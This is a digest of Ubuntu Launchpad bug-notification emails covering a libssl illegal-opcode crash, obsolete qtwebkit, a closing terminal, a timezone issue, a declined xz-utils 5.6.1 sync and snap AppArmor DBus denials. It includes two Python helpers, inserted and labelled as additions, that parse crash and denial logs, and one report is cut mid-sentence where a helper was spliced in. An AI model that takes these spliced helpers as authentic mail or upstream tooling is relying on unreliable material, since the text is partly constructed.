[Touch-packages] [Bug 2063271] Re: Illegal opcode in libssl
Thanks for reporting this issue - but it is strange, since this update has been published since 2024-02-27 and this is the first such report of any issues. Also, given this update has been available for nearly 2 months, it is surprising you are seeing errors from it so much later - I wonder instead whether the on-disk binary has been corrupted? Can you please try reinstalling libssl3 and see if that resolves the issue:

```
sudo apt install --reinstall libssl3
```

If this does resolve the issue, it might be worth checking whether you have any failing hardware / disks etc. that may have led to this problem.

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/2063271

Title: Illegal opcode in libssl

Status in openssh package in Ubuntu: New

Bug description:

Many programs using openssl now fail, typically with messages such as

```
Illegal instruction (core dumped)
```

This seems to be a serious error, since it affects, for example, update-manager. Since this makes it harder to get security updates, I would also consider it a security vulnerability. The issue seems to be an attempt by openssl to use an illegal opcode.
A few sample entries in /var/log/syslog are:

```
Apr 21 19:16:39 einstein kernel: [495465.431588] traps: update-manager[396881] trap invalid opcode ip:740964b8ac6b sp:7409552125b0 error:0 in libssl.so.3[740964b7a000+5b000]
Apr 21 19:16:55 einstein kernel: [495482.104658] traps: python3[396949] trap invalid opcode ip:73607be8ac6b sp:736074d8d5b0 error:0 in libssl.so.3[73607be7a000+5b000]
Apr 21 19:40:05 einstein kernel: [496871.653271] traps: chrome-gnome-sh[397293] trap invalid opcode ip:79432ffa7c6b sp:7ffd6bc03e70 error:0 in libssl.so.3[79432ff97000+5b000]
Apr 22 16:23:08 einstein kernel: [501744.765118] traps: check-new-relea[400397] trap invalid opcode ip:797c7cc8ac6b sp:797c6cace5b0 error:0 in libssl.so.3[797c7cc7a000+5b000]
Apr 23 15:08:03 einstein kernel: [518701.050526] traps: wget[443588] trap invalid opcode ip:73a8b2eb4c6b sp:7ffc04918740 error:0 in libssl.so.3[73a8b2ea4000+5b000]
Apr 23 15:12:55 einstein kernel: [518992.493020] traps: curl[443851] trap invalid opcode ip:7e4e3951dc6b sp:7ffc804d2ed0 error:0 in libssl.so.3[7e4e3950d000+5b000]
Apr 23 15:13:32 einstein kernel: [519029.181422] traps: apport-gtk[04] trap invalid opcode ip:7039180f5c6b sp:703902bfaad0 error:0 in libssl.so.3[7039180e5000+5b000]
```

This bug report itself had to be submitted manually since ubuntu-bug now itself fails.
lsb_release -rd reports:

```
Description:    Ubuntu 22.04.4 LTS
Release:        22.04
```

apt-cache policy openssl reports:

```
openssl:
  Installed: 3.0.2-0ubuntu1.15
  Candidate: 3.0.2-0ubuntu1.15
  Version table:
 *** 3.0.2-0ubuntu1.15 500
        500 http://us.archive.ubuntu.com/ubuntu jammy-updates/main amd64 Packages
        500 http://security.ubuntu.com/ubuntu jammy-security/main amd64 Packages
        100 /var/lib/dpkg/status
     3.0.2-0ubuntu1 500
        500 http://us.archive.ubuntu.com/ubuntu jammy/main amd64 Packages
```

/proc/version for my computer gives

```
Linux version 6.5.0-28-generic (buildd@lcy02-amd64-098) (x86_64-linux-gnu-gcc-12 (Ubuntu 12.3.0-1ubuntu1~22.04) 12.3.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #29~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Apr 4 14:39:20 UTC 2
```

/proc/cpuinfo for my computer starts

```
processor       : 0
vendor_id       : GenuineIntel
cpu family      : 6
model           : 78
model name      : Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz
stepping        : 3
microcode       : 0xf0
cpu MHz         : 500.018
cache size      : 4096 KB
physical id     : 0
siblings        : 4
core id         : 0
cpu cores       : 2
apicid          : 0
initial apicid  : 0
fpu             : yes
fpu_exception   : yes
cpuid level     : 22
wp              : yes
flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf pni pclmulqdq dtes64 monitor ds_cpl est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid mpx rdseed adx smap clflushopt intel_pt xsaveopt xsavec xgetbv1 xsaves dtherm ida arat pln pts hwp hwp_notify hwp_act_window hwp_epp md_clear flush_l1d arch_capabilities
bugs            : cpu_meltdown spectre_v1 spectre_v2 spec_store_bypass l1tf mds swapgs itlb_multihit srbds mmio_stale_data retbleed gds
bogomips        : 5199.98
clflush size    : 64
cache_alignment : 64
address sizes   : 39 bits physical, 48
```
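An added triage helper, not part of the bug report or the maintainer's reply: it parses kernel "traps:" lines like the ones quoted above and converts each faulting ip into a file-relative offset inside the mapped library, so it is immediately visible whether every process is dying at one and the same instruction in libssl.so.3 (the pattern a corrupted or CPU-incompatible on-disk binary produces, and the thing a reinstall would change). The sample lines are copied from the report; the function names are this example's own.

```python
import re
from collections import defaultdict

# Sample input: kernel "traps:" lines as quoted in the bug report above (constructed subset).
SAMPLE_SYSLOG = """\
Apr 21 19:16:39 einstein kernel: [495465.431588] traps: update-manager[396881] trap invalid opcode ip:740964b8ac6b sp:7409552125b0 error:0 in libssl.so.3[740964b7a000+5b000]
Apr 21 19:16:55 einstein kernel: [495482.104658] traps: python3[396949] trap invalid opcode ip:73607be8ac6b sp:736074d8d5b0 error:0 in libssl.so.3[73607be7a000+5b000]
Apr 23 15:08:03 einstein kernel: [518701.050526] traps: wget[443588] trap invalid opcode ip:73a8b2eb4c6b sp:7ffc04918740 error:0 in libssl.so.3[73a8b2ea4000+5b000]
Apr 23 15:12:55 einstein kernel: [518992.493020] traps: curl[443851] trap invalid opcode ip:7e4e3951dc6b sp:7ffc804d2ed0 error:0 in libssl.so.3[7e4e3950d000+5b000]
Apr 23 15:13:32 einstein kernel: [519029.181422] traps: apport-gtk[04] trap invalid opcode ip:7039180f5c6b sp:703902bfaad0 error:0 in libssl.so.3[7039180e5000+5b000]
"""

# One kernel trap report: comm[pid] trap <kind> ip:<hex> sp:<hex> error:<n> in <object>[<base>+<size>]
TRAP_RE = re.compile(
    r"traps: (?P<comm>\S+?)\[(?P<pid>\d+)\] trap (?P<kind>.+?) "
    r"ip:(?P<ip>[0-9a-f]+) sp:[0-9a-f]+ error:\d+ "
    r"in (?P<obj>\S+?)\[(?P<base>[0-9a-f]+)\+(?P<size>[0-9a-f]+)\]"
)


def parse_traps(text):
    """Yield (comm, kind, obj, offset, size) for each trap line.

    ip is an absolute address inside the faulting process; subtracting the
    mapping base gives the offset into the library's file-backed text, which
    is the only value comparable across processes (ASLR moves the base).
    """
    for m in TRAP_RE.finditer(text):
        ip, base, size = (int(m.group(k), 16) for k in ("ip", "base", "size"))
        yield m.group("comm"), m.group("kind"), m.group("obj"), ip - base, size


def fault_sites(text):
    """Group faults by (object, offset) -> list of process names that hit it."""
    sites = defaultdict(list)
    for comm, kind, obj, off, size in parse_traps(text):
        if kind != "invalid opcode":
            continue  # this report is only about #UD traps
        if not 0 <= off < size:
            continue  # ip outside the mapping: not this library's code
        sites[(obj, off)].append(comm)
    return dict(sites)


def triage(text):
    """Summarise: one shared fault site points at the on-disk library itself."""
    sites = fault_sites(text)
    if not sites:
        return "no invalid-opcode traps found"
    if len(sites) == 1:
        (obj, off), procs = next(iter(sites.items()))
        # The same instruction in every process means the bytes on disk are
        # what to check next (reinstall the package, then verify the file and
        # the disk), which is what the maintainer's reply suggests.
        return f"single site {obj}+{off:#x} hit by {len(procs)} processes: {', '.join(procs)}"
    return f"{len(sites)} distinct fault sites; not one bad instruction"


if __name__ == "__main__":
    print(triage(SAMPLE_SYSLOG))
```

Every line quoted in the report resolves to the same offset, libssl.so.3+0x10c6b.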
[Touch-packages] [Bug 2061191]
Thanks for taking the time to report this bug and helping to make Ubuntu better. Since the package referred to in this bug is in universe or multiverse, it is community maintained. If you are able, I suggest coordinating with upstream and posting a debdiff for this issue. When a debdiff is available, members of the security team will review it and publish the package. See the following link for more information: https://wiki.ubuntu.com/SecurityTeam/UpdateProcedures

** Tags added: community-security

** Information type changed from Private Security to Public Security

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to qtwebkit-opensource-src in Ubuntu.
https://bugs.launchpad.net/bugs/2061191

Title: Probably stone-age old and insecure version with remote code execution

Status in qtwebkit-opensource-src package in Ubuntu: New

Bug description:

Hi,

Ubuntu 24.04 beta still uses libqt5webkit5. It is not obvious where it comes from, but the version is still an alpha4, and the link in the README seems to suggest that it still comes from https://github.com/annulen/webkit, which redirects to https://github.com/qtwebkit/qtwebkit, where the alpha4 tag is over 4 years old.

There, the latest README tells:

  Code in this repository is obsolete. If you are looking for up-to-date QtWebKit use this fork: https://github.com/movableink/webkit

https://github.com/movableink/webkit seems to be still maintained – more or less. And calls itself "inofficial mirror".

Have a look at https://blogs.gnome.org/mcatanzaro/2022/11/04/stop-using-qtwebkit/ which calls qtwebkit insecure, poorly maintained, and cites CVEs about remote code execution (some of them would have to be fixed in the fork, but probably not in the version here in Ubuntu).

The problem is that tools like wkhtmltopdf do use this library and are typically used to pull contents from a given URL, i.e. from foreign websites. Processing foreign HTML and Javascript code in conjunction with vulnerabilities to remote code execution, this is highly dangerous.

ProblemType: Bug
DistroRelease: Ubuntu 24.04
Package: libqt5webkit5 5.212.0~alpha4-34ubuntu4
ProcVersionSignature: Ubuntu 6.8.0-22.22-generic 6.8.1
Uname: Linux 6.8.0-22-generic x86_64
ApportVersion: 2.28.0-0ubuntu1
Architecture: amd64
CasperMD5CheckResult: unknown
CurrentDesktop: KDE
Date: Fri Apr 12 23:31:43 2024
InstallationDate: Installed on 2024-04-12 (0 days ago)
InstallationMedia: Kubuntu 24.04 LTS "Noble Numbat" - Beta amd64 (20240411.2)
SourcePackage: qtwebkit-opensource-src
UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/qtwebkit-opensource-src/+bug/2061191/+subscriptions

--
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2061856]
Thanks for taking the time to report this bug and helping to make Ubuntu better. Your bug report is more likely to get attention if it is made in English, since this is the language understood by the majority of Ubuntu developers. Additionally, please only mark a bug as "security" if it shows evidence of allowing attackers to cross privilege boundaries or to directly cause loss of data/privacy. Please feel free to report any other bugs you may find.

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/2061856

Title: gnome terminal

Status in xorg package in Ubuntu: Incomplete

Bug description:

Hello, good morning. I have a problem with the Ubuntu shell terminal: as soon as I click to open it, it closes automatically. I have already tried using another terminal and it does the same thing. I also have fish installed, but it does the same thing, closing automatically. The only one that works is the VS Code terminal.

ProblemType: Bug
DistroRelease: Ubuntu 18.04
Package: xorg 1:7.7+19ubuntu7.1
ProcVersionSignature: Ubuntu 4.15.0-213.224-generic 4.15.18
Uname: Linux 4.15.0-213-generic i686
.tmp.unity_support_test.0:
ApportVersion: 2.20.9-0ubuntu7.29
Architecture: i386
CompizPlugins: No value set for `/apps/compiz-1/general/screen0/options/active_plugins'
CompositorRunning: None
Date: Tue Apr 16 12:04:00 2024
DistUpgraded: Fresh install
DistroCodename: bionic
DistroVariant: ubuntu
ExtraDebuggingInterest: Yes
GraphicsCard: Intel Corporation Core Processor Integrated Graphics Controller [8086:0042] (rev 12) (prog-if 00 [VGA controller])
  Subsystem: Elitegroup Computer Systems Core Processor Integrated Graphics Controller [1019:1324]
InstallationDate: Installed on 2023-07-23 (267 days ago)
InstallationMedia: Ubuntu 16.04.2 LTS "Xenial Xerus" - Release i386 (20170215.2)
Lsusb:
  Bus 002 Device 006: ID 04f3:0210 Elan Microelectronics Corp. Optical Mouse
  Bus 002 Device 002: ID 8087:0020 Intel Corp. Integrated Rate Matching Hub
  Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
  Bus 001 Device 002: ID 8087:0020 Intel Corp. Integrated Rate Matching Hub
  Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
MachineType: MEGAWARE H55H-CM
ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.15.0-213-generic root=UUID=3cfdb2f5-e8ec-4728-844a-29c984321037 ro quiet splash vt.handoff=1
Renderer: Software
SourcePackage: xorg
UpgradeStatus: No upgrade log present (probably fresh install)
dmi.bios.date: 05/18/2010
dmi.bios.vendor: American Megatrends Inc.
dmi.bios.version: 080015
dmi.board.asset.tag: To Be Filled By O.E.M.
dmi.board.name: MW-H55H-CM
dmi.board.vendor: MEGAWARE
dmi.board.version: 1.0
dmi.chassis.asset.tag: M0418501001
dmi.chassis.type: 3
dmi.chassis.vendor: MEGAWARE
dmi.chassis.version: 1.0
dmi.modalias: dmi:bvnAmericanMegatrendsInc.:bvr080015:bd05/18/2010:svnMEGAWARE:pnH55H-CM:pvrMEGAWARE:rvnMEGAWARE:rnMW-H55H-CM:rvr1.0:cvnMEGAWARE:ct3:cvr1.0:
dmi.product.family: To Be Filled By O.E.M.
dmi.product.name: H55H-CM
dmi.product.version: MEGAWARE
dmi.sys.vendor: MEGAWARE
version.compiz: compiz 1:0.9.13.1+18.04.20180302-0ubuntu1
version.libdrm2: libdrm2 2.4.101-2~18.04.1
version.libgl1-mesa-dri: libgl1-mesa-dri 20.0.8-0ubuntu1~18.04.1
version.libgl1-mesa-glx: libgl1-mesa-glx 20.0.8-0ubuntu1~18.04.1
version.xserver-xorg-core: xserver-xorg-core 2:1.19.6-1ubuntu4.15
version.xserver-xorg-input-evdev: xserver-xorg-input-evdev 1:2.10.5-1ubuntu1
version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:18.0.1-1
version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20171229-1
version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.15-2
xserver.bootTime: Thu Apr 4 13:22:01 2024
xserver.configfile: default
xserver.devices:
  inputPower Button KEYBOARD, id 6
  inputPower Button KEYBOARD, id 7
  inputPS/2+USB Mouse MOUSE, id 8
  inputAT Translated Set 2 keyboard KEYBOARD, id 9
xserver.logfile: /var/log/Xorg.0.log
xserver.version: 2:1.19.6-1ubuntu4.15
[Touch-packages] [Bug 2061856] Re: gnome terminal
Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

** Changed in: xorg (Ubuntu)
       Status: New => Incomplete

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/2061856

Title: gnome terminal

Status in xorg package in Ubuntu: Incomplete
[Touch-packages] [Bug 2062440] Re: A few days ago I realized that the time was four hours behind despite it being automatic with the correct time zone.
Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find.

** Information type changed from Private Security to Public

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to tzdata in Ubuntu.
https://bugs.launchpad.net/bugs/2062440

Title: A few days ago I realized that the time was four hours behind despite it being automatic with the correct time zone.

Status in tzdata package in Ubuntu: New

Bug description:

A few days ago I realized that the time was four hours behind despite it being automatic with the correct time zone.

```
root@lmobile4dcda1:/etc# apt reinstall tzdata
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
0 upgraded, 0 newly installed, 1 reinstalled, 0 to remove and 0 not upgraded.
Need to get 348 kB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 https://mirror.mia.velocihost.net/ubuntu jammy-updates/main amd64 tzdata all 2024a-0ubuntu0.22.04 [348 kB]
Fetched 348 kB in 6s (61,9 kB/s)
Preconfiguring packages ...
(Reading database ... 244685 files and directories currently installed.)
Preparing to unpack .../tzdata_2024a-0ubuntu0.22.04_all.deb ...
Unpacking tzdata (2024a-0ubuntu0.22.04) over (2024a-0ubuntu0.22.04) ...
Setting up tzdata (2024a-0ubuntu0.22.04) ...

Current default time zone: 'America/Caracas'
Local time is now:      jue 18 abr 2024 17:11:26 -04.
Universal Time is now:  Thu Apr 18 21:11:26 UTC 2024.

Run 'dpkg-reconfigure tzdata' if you wish to change it.
```

ProblemType: Bug
DistroRelease: Ubuntu 22.04
Package: tzdata 2024a-0ubuntu0.22.04
ProcVersionSignature: Ubuntu 6.5.0-27.28~22.04.1-generic 6.5.13
Uname: Linux 6.5.0-27-generic x86_64
ApportVersion: 2.20.11-0ubuntu82.5
Architecture: amd64
CasperMD5CheckResult: pass
CurrentDesktop: GNOME
Date: Thu Apr 18 16:52:36 2024
InstallationDate: Installed on 2023-11-18 (151 days ago)
InstallationMedia: Ubuntu 22.04.3 LTS "Jammy Jellyfish" - Release amd64 (20230807.2)
PackageArchitecture: all
SourcePackage: tzdata
UpgradeStatus: Upgraded to jammy on 2024-01-06 (103 days ago)
[Touch-packages] [Bug 2059417] Re: Sync xz-utils 5.6.1-1 (main) from Debian unstable (main)
Given this has been reverted in Debian, it should not be synced into Ubuntu.

** Changed in: xz-utils (Ubuntu)
       Status: New => Won't Fix

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xz-utils in Ubuntu.
https://bugs.launchpad.net/bugs/2059417

Title: Sync xz-utils 5.6.1-1 (main) from Debian unstable (main)

Status in xz-utils package in Ubuntu: Won't Fix

Bug description:

Please sync xz-utils 5.6.1-1 (main) from Debian unstable (main)

Hello! I am one of the upstream maintainers for XZ Utils. Version 5.6.1 was recently released and uploaded to Debian as a bugfix only release. Notably, this fixes a bug that causes Valgrind to issue a warning on any application dynamically linked with liblzma. This includes a lot of important applications. This could break build scripts and test pipelines that expect specific output from Valgrind in order to pass.

Additionally, this fixes a small typo for the man pages translations for Brazilian Portuguese, German, French, Korean, Romanian, and Ukrainian, and removes the need for patches applied for version 5.6.0-0.2.

The other bugfixes in this release have no impact on Ubuntu. They involve building with CMake or when building on a system without Landlock system calls defined (these are defined in Ubuntu).

Changelog entries since current noble version 5.6.0-0.2:

xz-utils (5.6.1-1) unstable; urgency=medium

  * Non-maintainer upload.
  * Import 5.6.1 (Closes: #1067708).
  * Takeover maintenance of the package.

 -- Sebastian Andrzej Siewior  Wed, 27 Mar 2024 22:53:21 +0100

Excerpt from the NEWS entry from upstream:

5.6.1 (2024-03-09)

    * liblzma: Fixed two bugs relating to GNU indirect function (IFUNC) with GCC. The more serious bug caused a program linked with liblzma to crash on start up if the flag -fprofile-generate was used to build liblzma. The second bug caused liblzma to falsely report an invalid write to Valgrind when loading liblzma.

    * xz: Changed the messages for thread reduction due to memory constraints to only appear under the highest verbosity level.

    * Build:

      - Fixed a build issue when the header file was present on the system but the Landlock system calls were not defined in .

      - The CMake build now warns and disables NLS if both gettext tools and pre-created .gmo files are missing. Previously, this caused the CMake build to fail.

    * Minor improvements to man pages.

    * Minor improvements to tests.
[Touch-packages] [Bug 2056696] Re: All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors
Ok, whilst I still can't see the /StatusNotifierItem object listed via d-feet, I can reproduce the denials when launching element-desktop, so I have added some additional changes to the aforementioned PR which resolve these as well. With all the changes from that PR in place all of these mentioned denials are resolved.

** Changed in: snapd
       Status: New => In Progress

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/2056696

Title: All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors

Status in snapd: In Progress
Status in apparmor package in Ubuntu: Confirmed

Bug description:

OS: Kubuntu Noble 24.04 Alpha (two-day old install)
snapd version: 2.61.2
Affected Snaps: firefox, thunderbird, element-desktop

Steps to reproduce:

# For Firefox:
1. Open the Firefox Snap.
2. Open https://www.bennish.net/web-notifications.html.
3. Click "Authorize" and allow the website to send notifications.
4. Click "Show".
Expected result: A notification should be displayed by Plasma, similar to other notifications the system displays.
Actual result: The notification shows up in the upper-right corner of the display, improperly themed and obviously generated by Firefox as a fallback.

# For Thunderbird:
1. Open the Thunderbird Snap.
2. Ensure you are connected to an email account.
3. Unfocus the Thunderbird window.
4. Wait for an email to come through.
Expected result: When the email comes through, a notification should be displayed by Plasma, similar to other notifications the system displays.
Actual result: The notification shows up improperly themed and obviously generated by Thunderbird as a fallback.

# For Element:
1. Open the Element Snap.
Expected result: An apptray indicator should appear in the system tray with the Element logo.
Actual result: No such indicator appears.
2. Log in, ask someone to ping you, then unfocus the window and wait for the ping to come through.
Expected result: A notification should be displayed by Plasma, similar to other notifications the system displays.
Actual result: No notification appears at all.

Additional information:

Based on the output of snappy-debug, this appears to be AppArmor related, at least for element-desktop (but presumably for the others too). Of note are some of the following log entries:

```
= AppArmor =
Time: 2024-03-10T13:4
Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/org/freedesktop/DBus" interface="org.freedesktop.DBus" member="ListActivatableNames" mask="send" name="org.freedesktop.DBus" pid=2950 label="snap.element-desktop.element-desktop" peer_label="unconfined"
DBus access

= AppArmor =
Time: 2024-03-10T13:4
Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/modules/kwalletd5" interface="org.kde.KWallet" member="isEnabled" mask="send" name="org.kde.kwalletd5" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=1762 peer_label="unconfined"
DBus access

= AppArmor =
Time: 2024-03-10T13:4
Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/modules/kwalletd5" interface="org.kde.KWallet" member="close" mask="send" name="org.kde.kwalletd5" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=1762 peer_label="unconfined"
DBus access

= AppArmor =
Time: 2024-03-10T13:4
Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/StatusNotifierItem" interface="org.freedesktop.DBus.Properties" member="GetAll" name=":1.45" mask="receive" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=2394 peer_label="plasmashell"
DBus access

= AppArmor =
Time: 2024-03-10T13:4
Log: apparmor="DENIED" operation="dbus_signal" bus="session" path="/StatusNotifierItem" interface="org.kde.StatusNotifierItem" member="NewToolTip" mask="send" name="org.freedesktop.DBus" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=2394 peer_label="plasmashell"
DBus access
```

Booting with `apparmor=0` set on the kernel command line fixes the issue with Element (apptray indicator appears, notifications show up). Obviously this is not a solution, but it does isolate AppArmor as being at least partially at fault.

This issue seems to be somewhat similar to https://forum.snapcraft.io/t/dbus-related-apparmor-denials/37422, however it seems as if Element is trying to hit the right paths and interfaces and is still being denied (based on looking at the info in https://github.com/snapcore/snapd/blob/master/interfaces/builtin/desktop_legacy.go and comparing the paths and interfaces there with the paths and interfaces shown by snappy-debug).

I talked about this issue with Erich Eickmeyer and he mentioned that it occurred after a Plasma update. This
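An added helper, not from the bug report and not snapd's or AppArmor's own tooling: it parses snappy-debug DBus denial entries like those above into their fields and renders each as the apparmor.d(5)-style dbus rule that would cover it, grouped by the confined label, so the resulting set can be compared line by line with what the desktop-legacy interface already grants. Unique connection names such as :1.45 are deliberately left out of the peer constraint because they change on every connection; the sample entries are copied from the report and the function names are this example's own.

```python
import re
from collections import OrderedDict

# Sample input: three of the snappy-debug entries quoted in the bug report (constructed subset).
SAMPLE_LOG = """\
= AppArmor =
Time: 2024-03-10T13:4
Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/modules/kwalletd5" interface="org.kde.KWallet" member="isEnabled" mask="send" name="org.kde.kwalletd5" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=1762 peer_label="unconfined"
DBus access
= AppArmor =
Time: 2024-03-10T13:4
Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/StatusNotifierItem" interface="org.freedesktop.DBus.Properties" member="GetAll" name=":1.45" mask="receive" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=2394 peer_label="plasmashell"
DBus access
= AppArmor =
Time: 2024-03-10T13:4
Log: apparmor="DENIED" operation="dbus_signal" bus="session" path="/StatusNotifierItem" interface="org.kde.StatusNotifierItem" member="NewToolTip" mask="send" name="org.freedesktop.DBus" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=2394 peer_label="plasmashell"
DBus access
"""

# key="quoted value" or key=bareword, as the AppArmor audit line prints them.
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_dbus_denials(text):
    """Return a dict of fields for every DENIED dbus_* line in the log text."""
    denials = []
    for line in text.splitlines():
        if 'apparmor="DENIED"' not in line:
            continue
        fields = {k: quoted or bare for k, quoted, bare in FIELD_RE.findall(line)}
        if fields.get("operation", "").startswith("dbus_"):
            denials.append(fields)
    return denials


def rule_for(d):
    """Render one denial as an apparmor.d(5) dbus rule; the access comes from mask=."""
    parts = [f"dbus ({d['mask']})", f"bus={d['bus']}", f"path={d['path']}"]
    for key in ("interface", "member"):
        if key in d:
            parts.append(f"{key}={d[key]}")
    peer = []
    name = d.get("name", "")
    # Unique names (":1.45") are handed out per connection and would never
    # match again; only well-known names belong in a profile.
    if name and not name.startswith(":"):
        peer.append(f"name={name}")
    if d.get("peer_label"):
        peer.append(f"label={d['peer_label']}")
    if peer:
        parts.append("peer=(" + ", ".join(peer) + ")")
    return " ".join(parts) + ","


def rules_by_profile(text):
    """Map confined label -> ordered, de-duplicated list of rules it was denied."""
    out = OrderedDict()
    for d in parse_dbus_denials(text):
        rules = out.setdefault(d["label"], [])
        rule = rule_for(d)
        if rule not in rules:
            rules.append(rule)
    return out


if __name__ == "__main__":
    for label, rules in rules_by_profile(SAMPLE_LOG).items():
        print(f"# {label}")
        for rule in rules:
            print("  " + rule)
```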
[Touch-packages] [Bug 2056696] Re: All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors
The subsequent error is:

  Main script file /usr/lib/x86_64-linux-gnu/calamares/modules/automirror/main.py for python job automirror raised an exception.

Is there any way I can debug this further?

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/2056696

Title: All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors

Status in snapd: New
Status in apparmor package in Ubuntu: Confirmed
[Touch-packages] [Bug 2056696] Re: All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors
Ah, although it seems I can reboot the VM at this point, and whilst Calamares appeared to run again in the rebooted VM, if I choose Install, Calamares closes and I see the installed Kubuntu environment - weird. Anyway, I think I will be able to use this to debug the original issue further - will continue and let you know what I find.

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/2056696

Title:
  All Snaps are denied the ability to use DBus for notifications and apptray indicators in KDE-based flavors

Status in snapd:
  New
Status in apparmor package in Ubuntu:
  Confirmed

Bug description:
  OS: Kubuntu Noble 24.04 Alpha (two-day old install)
  snapd version: 2.61.2
  Affected Snaps: firefox, thunderbird, element-desktop

  Steps to reproduce:

  # For Firefox:
  1. Open the Firefox Snap.
  2. Open https://www.bennish.net/web-notifications.html.
  3. Click "Authorize" and allow the website to send notifications.
  4. Click "Show".
  Expected result: A notification should be displayed by Plasma, similar to other notifications the system displays.
  Actual result: The notification shows up in the upper-right corner of the display, improperly themed and obviously generated by Firefox as a fallback.

  # For Thunderbird:
  1. Open the Thunderbird Snap.
  2. Ensure you are connected to an email account.
  3. Unfocus the Thunderbird window.
  4. Wait for an email to come through.
  Expected result: When the email comes through, a notification should be displayed by Plasma, similar to other notifications the system displays.
  Actual result: The notification shows up improperly themed and obviously generated by Thunderbird as a fallback.

  # For Element:
  1. Open the Element Snap.
  Expected result: An apptray indicator should appear in the system tray with the Element logo.
  Actual result: No such indicator appears.
  2. Log in, ask someone to ping you, then unfocus the window and wait for the ping to come through.
  Expected result: A notification should be displayed by Plasma, similar to other notifications the system displays.
  Actual result: No notification appears at all.

  Additional information:
  Based on the output of snappy-debug, this appears to be AppArmor related, at least for element-desktop (but presumably for the others too). Of note are some of the following log entries:

  ```
  = AppArmor =
  Time: 2024-03-10T13:4
  Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/org/freedesktop/DBus" interface="org.freedesktop.DBus" member="ListActivatableNames" mask="send" name="org.freedesktop.DBus" pid=2950 label="snap.element-desktop.element-desktop" peer_label="unconfined"
  DBus access

  = AppArmor =
  Time: 2024-03-10T13:4
  Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/modules/kwalletd5" interface="org.kde.KWallet" member="isEnabled" mask="send" name="org.kde.kwalletd5" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=1762 peer_label="unconfined"
  DBus access

  = AppArmor =
  Time: 2024-03-10T13:4
  Log: apparmor="DENIED" operation="dbus_method_call" bus="session" path="/modules/kwalletd5" interface="org.kde.KWallet" member="close" mask="send" name="org.kde.kwalletd5" pid=2950 label="snap.element-desktop.element-desktop" peer_pid=1762 peer_label="unconfined"
  DBus access

  = AppArmor =
  Time: 2024-03-10T13:4
